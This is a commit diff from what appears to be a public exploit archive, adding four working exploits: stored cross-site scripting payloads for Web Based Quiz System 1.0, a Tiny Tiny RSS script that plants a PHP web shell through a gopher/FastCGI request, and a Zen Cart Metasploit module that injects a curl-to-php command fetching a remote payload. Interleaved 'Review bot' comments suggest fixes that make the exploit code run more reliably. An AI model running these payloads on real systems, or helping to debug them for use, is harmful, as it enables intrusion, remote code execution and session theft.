DB: 2021-03-03

4 changes to exploits/shellcodes

Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
Tiny Tiny RSS - Remote Code Execution
Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
Zen Cart 1.5.7b - Remote Code Execution (Authenticated)
Offensive Security 2021-03-03 05:01:55 +00:00
parent 75667550f6
commit b35005d47b
5 changed files with 402 additions and 0 deletions


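--- /dev/null
+++ b/exploits/php/webapps/49605.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
+# Date: 2021-03-02
+# Exploit Author: Praharsh Kumar Singh
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software: Web Based Quiz System
+# Version: 1.0
+# Vulnerability Type: Cross-site Scripting
+# Vulnerability: Persistent/Stored XSS
+# Tested on: Parrot OS
+# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in adding questions in options parameter affected from this vulnerability.
+# payload: </script><script >alert(document.cookie)</script>
+POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 101
+Origin: http://localhost
+DNT: 1
+Connection: close
+Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
+Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
+POC:
+# go to url http://localhost:8080/admin.php
+# login and add question
+# then put the above payload in MCQ options parameter
+# then fill the remaining details
+# then click add
+# go to url http://localhost:8080/login.php
+# then login to user account
+# then attempt the quiz while attempting the quiz xss pop up there..!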
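Review bot: The reproduction steps do not match the captured request: the request is sent to `/onlinequiz_0/update.php` with `Host: localhost`, while the POC steps use `http://localhost:8080/admin.php` and `http://localhost:8080/login.php`, so the base path and port of the tested install are ambiguous. Adding a line such as `# Base URL of the tested install: http://localhost/onlinequiz_0/` (or correcting the POC URLs to match the capture) would remove the ambiguity. The advisory also states no root cause or remediation; as the stored option text is evidently rendered without output encoding when the quiz is taken, one sentence recommending that option text be HTML-encoded on output (PHP `htmlspecialchars`) would make the record useful to defenders. The same remediation gap applies to the 'name' advisory in 49607.txt later in this commit.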

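--- /dev/null
+++ b/exploits/php/webapps/49606.py
@@ -0,0 +1,83 @@
+# Exploit Title: Tiny Tiny RSS - Remote Code Execution
+# Date: 21/09/2020
+# Exploit Author: Daniel Neagaru & Benjamin Nadarević
+# Blog post: https://www.digeex.de/blog/tinytinyrss/
+# Software Link: https://git.tt-rss.org/fox/tt-rss
+# Version: all before 2020-09-16
+# Commit with the fixes: https://git.tt-rss.org/fox/tt-rss/commit/c3d14e1fa54c7dade7b1b7955575e2991396d7ef
+# Tested on: default docker installation method
+# CVE : CVE-2020-25787
+#!/usr/bin/env python3
+from sys import argv
+import urllib.parse as ul
+import base64
+def CustomFcgi( filename, output, backdoor):
+length=len(output)+len(backdoor)+64
+char=chr(length)
+data = "\x0f\x10SERVER_SOFTWAREgo / fcgiclient \x0b\tREMOTE_ADDR127.0.0.1\x0f\x08SERVER_PROTOCOLHTTP/1.1\x0e" + chr(len(str(length)))
+data += "CONTENT_LENGTH" + str(length) + "\x0e\x04REQUEST_METHODPOST\tKPHP_VALUEallow_url_include = On\n"
+data += "disable_functions = \nauto_prepend_file = php://input\x0f" + chr(len(filename)) +"SCRIPT_FILENAME" + filename + "\r\x01DOCUMENT_ROOT/"
+temp1 = chr(len(data) // 256)
+temp2 = chr(len(data) % 256)
+temp3 = chr(len(data) % 8)
+end = str("\x00"*(len(data)%8)) + "\x01\x04\x00\x01\x00\x00\x00\x00\x01\x05\x00\x01\x00" + char + "\x04\x00"
+end += "<?php file_put_contents('" + output + "',base64_decode("+ "'"+str(backdoor.decode('ascii'))+"')"+");die('executed');?>\x00\x00\x00\x00"
+start = "\x01\x01\x00\x01\x00\x08\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x01\x04\x00\x01" + temp1 + temp2 + temp3 + "\x00"
+payload = start + data + end
+def get_payload(payload):
+finalpayload = ul.quote_plus(payload, encoding="latin-1").replace("+","%20").replace("%2F","/")
+return finalpayload
+return "gopher://localhost:9000/_"+get_payload(get_payload(payload))
+TTRSS_PATH = "/var/www/html/tt-rss/"
+BACKDOOR_CODE = """
+<?php
+echo "success\n";
+echo system($_GET['cmd']);
+?>
+"""
+feed_file = open("malicious_RCE_feed.xml",'w')
+filename = TTRSS_PATH + "config.php"
+output = TTRSS_PATH + "backdoor.php"
+backdoor_code = base64.b64encode(BACKDOOR_CODE.encode("ascii"))
+rce = "public.php?op=pluginhandler&plugin=af_proxy_http&pmethod=imgproxy&url=" + CustomFcgi(filename, output, backdoor_code) + "&text"
+feed ="""<?xml version="1.0" encoding="UTF-8" ?>
+<rss version="2.0">
+<channel>
+<title>Exploit demo - rce</title>
+<link></link>
+<description>You are getting infected :(</description>
+<item>
+<title> Check if there is backdoor.php</title>
+<link><![CDATA[backdoor.php?cmd=id&bypass_filter=://]]></link>
+<description>
+<![CDATA[
+Dummy text
+<img src="{}">
+]]>
+</description>
+</item>
+</channel>
+</rss>
+""".format(rce)
+feed_file.write(feed)
+feed_file.close()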
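Review bot: `#!/usr/bin/env python3` is placed after the header comment block rather than on line 1, so it is not a shebang and the file, although committed as executable, will not run as `./49606.py`; move it above `# Exploit Title:`. `from sys import argv` is never used and should be dropped. The feed file is opened with a bare `open` near the top of the script and closed manually at the very end; writing it as `with open("malicious_RCE_feed.xml", "w") as feed_file:` followed by `feed_file.write(feed)` keeps the handle scoped and closes it even if the `format` step raises.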


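--- /dev/null
+++ b/exploits/php/webapps/49607.txt
@@ -0,0 +1,60 @@
+# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
+# Date: 2021-03-02
+# Exploit Author: P.Naveen Kumar
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
+# Software : Web Based Quiz System
+# Version : 1.0
+# Vulnerability Type : Cross-site Scripting
+# Vulnerability : Persistent/Stored XSS
+# Tested on: Windows 10 Pro
+# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
+# in registration form in name parameter affected from this vulnerability.
+# payload: <script>alert(document.cookie)</script>
+# HTTP POST request
+POST http://localhost:8080/quiz/register.php HTTP/1.1
+Host: localhost:8080
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
+Content-Length: 690
+Origin: http://localhost:8080
+Connection: keep-alive
+Referer: http://localhost:8080/quiz/register.php
+Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
+Upgrade-Insecure-Requests: 1
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="name"
+<script>alert(document.cookie)</script>
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="email"
+test123@gmail.com
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="password"
+Hacker
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="college"
+hello
+-----------------------------283640616528311462411171270636
+Content-Disposition: form-data; name="submit"
+-----------------------------283640616528311462411171270636--
+POC:
+# go to url http://localhost:8080/quiz/register.php
+# then you have to fill the above payload in name/username parameter
+# then fill the remaining details
+# then click submit
+# then login to user account
+# then attempt any one quiz after attempting go to ranking section then
+# you can see xss pop up there..!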

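--- /dev/null
+++ b/exploits/php/webapps/49608.rb
@@ -0,0 +1,213 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+###
+#
+#
+# This exploit write payload in database and trig to command
+# a bug in an zencart v1.5.7b web application
+#
+###
+class MetasploitModule < Msf::Exploit::Remote
+Rank = NormalRanking
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::Remote::HttpServer
+def initialize(info = {})
+super(
+update_info(
+info,
+'Name' => 'zencart authenticated remote code execution exploit',
+'Description' => %q(
+This exploit module execution os command in zencart.
+),
+'License' => MSF_LICENSE,
+'Author' => ['Mucahit Saratar <trregen222@gmail.com>'], # msf module & research & poc
+'References' =>[
+[ 'OSVDB', '' ],
+[ 'EDB', '' ],
+[ 'URL', 'https://github.com/MucahitSaratar/zencart_auth_rce_poc'],
+[ 'CVE', '2021-3291']
+],
+'Platform' => 'php',
+'Privileged' => false,
+'Arch' => ARCH_PHP,
+'Targets' => [ ['Automatic', { }] ],
+'DisclosureDate' => '2021-01-22',
+'DefaultTarget' => 0
+)
+)
+register_options(
+[
+Opt::RPORT(80),
+OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+OptString.new('PASSWORD', [ true, 'Password to login with', '']),
+OptString.new('BASEPATH', [ true, 'zencart base path eg. /zencart/', '/']),
+OptString.new('MODULE', [ true, 'Module name. eg. payment,shipping,ordertotal,plugin_manager', 'payment']),
+OptString.new('SETTING', [ true, 'setting name. eg. freecharger for payment', 'freecharger']),
+OptString.new('TARGETURI', [ true, 'Admin Panel Path', '/cracK-Fqu-trasH/'])
+], self.class
+)
+end
+def start_server
+ssltut = false
+if datastore["SSL"]
+ssltut = true
+datastore["SSL"] = false
+end
+start_service({'Uri' => {
+'Proc' => Proc.new { |cli, req|
+on_request_uri(cli, req)
+},
+'Path' => resource_uri
+}})
+print_status("payload is on #{get_uri}")
+@adresim = get_uri
+datastore['SSL'] = true if ssltut
+end
+def on_request_uri(cli, request)
+print_good('First stage is executed ! Sending 2nd stage of the payload')
+send_response(cli, payload.encoded, {'Content-Type'=>'text/html'})
+end
+def tabanyol
+datastore["BASEPATH"]
+end
+def isim
+datastore["USERNAME"]
+end
+def parola
+datastore["PASSWORD"]
+end
+def login
+#"index.php?cmd=login&camefrom=index.php"
+res = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+'vars_get' => {
+'cmd' => 'login',
+'camefrom' => 'index.php'
+})
+# <input type="hidden" name="securityToken" value="c77815040562301dafaef1c84b7aa3f3" />
+unless res
+fail_with(Failure::Unreachable, "Access web application failure")
+end
+if res.code != 200
+fail_with(Failure::Unreachable, "we not have 200 response")
+end
+if !res.get_cookies.empty?
+@cookie = res.get_cookies
+@csrftoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
+if @csrftoken.empty?
+fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
+end
+vprint_good("login Csrf token: "+@csrftoken)
+end
+res = send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(tabanyol, target_uri.path, "index.php?cmd=login&camefrom=index.php"),
+'cookie' => @cookie,
+'vars_post' => {
+'securityToken' => @csrftoken,
+'action' => "do"+@csrftoken,
+'admin_name' => isim,
+'admin_pass' => parola
+})
+if res.code != 302
+fail_with(Failure::UnexpectedReply, 'There is no CSRF token at HTTP response.')
+end
+true
+end
+def check
+unless login
+fail_with(Failure::UnexpectedReply, 'Wrong credentials')
+return CheckCode::NotVulnerable('Wrong credentials')
+end
+print_good("We loged in")
+Exploit::CheckCode::Vulnerable
+CheckCode::Vulnerable('Authenticated successfully')
+end
+def exploit
+check
+start_server
+sleep(4)
+res = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+'vars_get' => {
+'cmd' => 'modules',
+'set' => datastore["MODULE"],
+'module' => datastore["SETTING"],
+'action' => 'edit'
+},
+'cookie' => @cookie
+)
+if res.code != 200
+fail_with(Failure::UnexpectedReply, 'Something Wron. code must be 200')
+end
+# <input type="hidden" name="securityToken" value="09068bece11256d03ba55fd2d1f9c820" />
+if res && res.code == 200
+@formtoken = res.body.scan(/<input type="hidden" name="securityToken" value="(.*)" \/>/).flatten[0] || ''
+if @formtoken.empty?
+fail_with(Failure::UnexpectedReply, 'securitytoken not in response')
+end
+#print_good(@formtoken)
+# <form name="modules"
+@radiolar = res.body.scan(/<input type="radio" name="configuration\[(.*)\]" value="True"/)
+@selectler = res.body.scan(/<select rel="dropdown" name="configuration\[(.*)\]" class="form-control">/)
+@textarr = res.body.scan(/<input type="text" name="configuration\[(.*)\]" value="0" class="form-control" \/>/)
+@secme = {}
+@secme["securityToken"] = @formtoken
+for @a in @radiolar
+@secme["configuration[#{@a[0]}]"] = "True','F'); echo `curl #{@adresim} |php`; //"
+end
+for @a in @selectler
+@secme["configuration[#{@a[0]}]"] = "0"
+end
+for @a in @textarr
+@secme["configuration[#{@a[0]}]"] = "0"
+end
+print_good(@secme.to_s)
+res = send_request_cgi(
+'method' => 'POST',
+'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+'cookie' => @cookie,
+'vars_get' => {
+'cmd' => 'modules',
+'set' => datastore["MODULE"],
+'module' => datastore["SETTING"],
+'action' => 'save'
+},
+'vars_post' => @secme
+)
+res = send_request_cgi(
+'method' => 'GET',
+'uri' => normalize_uri(tabanyol, target_uri.path, "index.php"),
+'vars_get' => {
+'cmd' => 'modules',
+'set' => datastore["MODULE"],
+'module' => datastore["SETTING"],
+'action' => 'edit'
+},
+'cookie' => @cookie
+)
+end
+end
+end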
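Review bot: `login` and `exploit` dereference `res` before checking it: `res.code != 302` at the end of `login` and `res.code != 200` at the top of `exploit` raise `NoMethodError` when `send_request_cgi` returns nil, and the `if res && res.code == 200` guard that follows the latter comes too late to help; add `fail_with(Failure::Unreachable, 'No response from target') unless res` before each `.code` check. The 302 check in `login` also reuses the CSRF-token message ('There is no CSRF token at HTTP response.') where the condition actually detected is a failed login, so the message misleads the operator. `check` calls `fail_with` before its `return CheckCode::NotVulnerable`, which makes the return unreachable and aborts the module instead of reporting NotVulnerable, and the bare `Exploit::CheckCode::Vulnerable` expression before the final line is a discarded value. The empty `[ 'OSVDB', '' ]` and `[ 'EDB', '' ]` reference entries should be removed. The `for @a in ...` loops use an instance variable as the loop variable; a local such as `for a in @radiolar` is the Ruby idiom.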


@ -43793,3 +43793,7 @@ id,file,description,date,author,type,platform,port
49602,exploits/multiple/webapps/49602.py,"VMware vCenter Server 7.0 - Unauthenticated File Upload",2021-03-01,Photubias,webapps,multiple,
49603,exploits/php/webapps/49603.py,"Online Catering Reservation System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,
49604,exploits/php/webapps/49604.py,"Covid-19 Contact Tracing System 1.0 - Remote Code Execution (Unauthenticated)",2021-03-01,"Christian Vierschilling",webapps,php,
49605,exploits/php/webapps/49605.txt,"Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting",2021-03-02,"Praharsh Kumar Singh",webapps,php,
49606,exploits/php/webapps/49606.py,"Tiny Tiny RSS - Remote Code Execution",2021-03-02,"Daniel Neagaru",webapps,php,
49607,exploits/php/webapps/49607.txt,"Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting",2021-03-02,"P.Naveen Kumar",webapps,php,
49608,exploits/php/webapps/49608.rb,"Zen Cart 1.5.7b - Remote Code Execution (Authenticated)",2021-03-02,"Mücahit Saratar",webapps,php,
